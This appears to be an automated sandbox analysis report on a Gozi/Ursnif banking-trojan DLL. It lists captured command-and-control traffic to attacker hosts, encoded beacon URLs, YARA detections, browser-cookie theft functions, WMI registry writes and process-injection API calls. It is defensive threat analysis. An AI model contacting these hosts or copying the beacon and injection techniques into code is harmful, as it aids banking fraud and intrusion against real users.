            Source: unknownHTTP traffic detected: POST /api1/LMJLtOqdu8fp_2BNLOB5YBP/qly_2BfzDH/EAemu37KWi1Sk2xGU/KUNgOk1dCHS6/AgjNesC_2FL/0VRR3489g9d213/hnGFcgoP3NnJY57aNNU7X/g37VutmCLLvxlC3K/uWdTjPXn7_2BhUq/Ng_2FAVek6bgpkb4dt/OleaxmqWa/3cqZOMqKlEvnCHKOagPS/Ml3FT3Cf6J9pNtnQsAy/H2GMz5cmt0xhyUBUDbZV2P/wT6YuW4qyfVDR/pXcknYbm/8zZh_2FbRECix2oRrtcd2ZU/_2B7miWVVc/ZZTomZrPf3ghqQ7Sj/_2FENCrsSLt7/pXfjB HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Content-Length: 2Host: api3.lepini.at
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 12 Feb 2021 08:59:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: loaddll32.exe, rundll32.exe, powershell.exe, 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, powershell.exe, 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
            Source: loaddll32.exe, 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, rundll32.exe, 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, powershell.exe, 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, powershell.exe, 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: powershell.exe, 0000001E.00000003.614713182.00000232FA37D000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: rundll32.exe, 00000001.00000003.542325936.0000000000C41000.00000004.00000001.sdmpString found in binary or memory: http://golang.feel500.at/api1/6DXTv_2FudTfVxedDD3UMQ/xS_2FoOKoiAeF/j0VSQAcL/gS9HWeAk0_2F3Z4xgoE9VU8/
            Source: rundll32.exe, 00000001.00000002.619811108.0000000000BE2000.00000004.00000001.sdmpString found in binary or memory: http://golang.feel500.at/api1/cQHZbpVEoMes2jDUrR_2F/bktLNyGZ_2BiAtXa/xg4NyCOv1cwnNr2/CgkDzrwWZPupVFo
            Source: loaddll32.exe, 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, rundll32.exe, 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, rundll32.exe, 00000001.00000003.599754815.0000000000D00000.00000004.00000001.sdmp, powershell.exe, 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, powershell.exe, 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: powershell.exe, 0000001E.00000002.656957513.00000232F1F33000.00000004.00000001.sdmp, powershell.exe, 00000021.00000002.654412669.0000018F6E153000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000021.00000002.614677054.0000018F5E2FE000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 0000001E.00000002.617070310.00000232E1ED1000.00000004.00000001.sdmp, powershell.exe, 00000021.00000002.613638611.0000018F5E0F1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000021.00000002.614677054.0000018F5E2FE000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000021.00000002.654412669.0000018F6E153000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000021.00000002.654412669.0000018F6E153000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000021.00000002.654412669.0000018F6E153000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000021.00000002.614677054.0000018F5E2FE000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 0000001E.00000002.656957513.00000232F1F33000.00000004.00000001.sdmp, powershell.exe, 00000021.00000002.654412669.0000018F6E153000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.436611302.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.542420710.0000000006FFB000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.437085492.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.480264315.00000000055AD000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.483299200.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.531676520.00000000054AF000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.483227814.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.483286163.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.483203935.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.483151802.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.437340303.00000000056AB000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.483178397.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.483270828.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.436829571.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.437112820.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.593087987.0000000000C00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.436872189.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.599754815.0000000000D00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.437218385.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.437202688.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.435392429.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.483251728.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6224, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6352, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6200, type: MEMORY

            E-Banking Fraud:

            barindex
            Detected Gozi e-Banking trojanShow sources
            Source: C:\Windows\System32\loaddll32.exeCode function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff0_2_009B5ECA
            Source: C:\Windows\System32\loaddll32.exeCode function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie0_2_009B5ECA
            Source: C:\Windows\System32\loaddll32.exeCode function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff0_2_009B5ECA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff1_2_00C95ECA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie1_2_00C95ECA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff1_2_00C95ECA
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.436611302.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.542420710.0000000006FFB000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.437085492.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.480264315.00000000055AD000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.483299200.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.531676520.00000000054AF000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.483227814.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.483286163.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.483203935.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.483151802.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.437340303.00000000056AB000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.483178397.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.483270828.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.436829571.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.437112820.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.593087987.0000000000C00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.436872189.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.599754815.0000000000D00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.437218385.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.437202688.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.435392429.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.483251728.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6224, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6352, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6200, type: MEMORY

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
            Source: 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009BA027 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,0_2_009BA027
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009C7AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,0_2_009C7AFF
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009CAC94 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,0_2_009CAC94
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009C6CBC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,0_2_009C6CBC
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009BACD5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_009BACD5
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009CCD7A NtQueryInformationProcess,0_2_009CCD7A
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009B7E14 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,0_2_009B7E14
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009C40A7 memset,NtQueryInformationProcess,0_2_009C40A7
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009B7878 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,0_2_009B7878
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009D298D memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,0_2_009D298D
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009BAA15 NtQuerySystemInformation,RtlNtStatusToDosError,0_2_009BAA15
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009C4C67 NtGetContextThread,RtlNtStatusToDosError,0_2_009C4C67
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009B9DAC NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,0_2_009B9DAC
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009B45FF OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,0_2_009B45FF
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009C956E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,0_2_009C956E
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009C1606 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,0_2_009C1606
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009B37E7 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,0_2_009B37E7
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00C9E010 GetProcAddress,NtCreateSection,memset,1_2_00C9E010
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00C9A027 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,1_2_00C9A027
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00CA7AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,1_2_00CA7AFF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00C9ACD5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,1_2_00C9ACD5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00CAAC94 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,1_2_00CAAC94
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00CA6CBC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,1_2_00CA6CBC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00C99DAC NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,1_2_00C99DAC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00CACD7A NtQueryInformationProcess,1_2_00CACD7A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00CA7579 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,1_2_00CA7579
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00C97E14 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,1_2_00C97E14
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00C937E7 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,1_2_00C937E7
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00CB47A1 NtMapViewOfSection,1_2_00CB47A1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00CA40A7 memset,NtQueryInformationProcess,1_2_00CA40A7
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00C97878 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,1_2_00C97878
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00CB298D memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,1_2_00CB298D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00C9AA15 NtQuerySystemInformation,RtlNtStatusToDosError,1_2_00C9AA15
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00CA4C67 NtGetContextThread,RtlNtStatusToDosError,1_2_00CA4C67
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00C945FF OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,1_2_00C945FF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00CA956E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,1_2_00CA956E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00CA1606 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,1_2_00CA1606
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009D1CB8 CreateProcessAsUserA,0_2_009D1CB8
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009C48AD0_2_009C48AD
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009BD0DC0_2_009BD0DC
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009CD0570_2_009CD057
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009D71880_2_009D7188
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009B62FA0_2_009B62FA
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009BE3840_2_009BE384
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009C8BF30_2_009C8BF3
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009B4C030_2_009B4C03
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009CED4B0_2_009CED4B
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009D3EAF0_2_009D3EAF
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009CD7BD0_2_009CD7BD
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00C9D0DC1_2_00C9D0DC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00CA48AD1_2_00CA48AD
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00CAD0571_2_00CAD057
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00CB71881_2_00CB7188
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00C962FA1_2_00C962FA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00CA8BF31_2_00CA8BF3
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00C9E3841_2_00C9E384
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00C94C031_2_00C94C03
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00CAED4B1_2_00CAED4B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00CB3EAF1_2_00CB3EAF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00CAD7BD1_2_00CAD7BD
            Source: lojdfmf3.dll.36.drStatic PE information: No import functions for PE file found
            Source: cuuygyc1.dll.35.drStatic PE information: No import functions for PE file found
            Source: 4puomjgc.dll.39.drStatic PE information: No import functions for PE file found
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: u8xtCk7fq8.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
            Source: 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
            Source: classification engineClassification label: mal100.bank.troj.evad.winDLL@39/68@13/2
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009BA7B1 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle,0_2_009BA7B1
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{1B3B83AA-6D5C-11EB-90E5-ECF4BB2D2496}.datJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{160F585B-7D7B-B806-B7AA-016CDB7EC560}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{B2482645-6990-B41E-8306-AD28679A31DC}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4712:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6192:120:WilError_01
            Source: C:\Windows\System32\loaddll32.exeMutant created: \Sessions\1\BaseNamedObjects\{9608A54E-FD26-38BC-372A-81EC5BFE45E0}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{5E77434C-2577-40BE-9F72-297443C66DE8}
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF94A0433F3C84B120.TMPJump to behavior
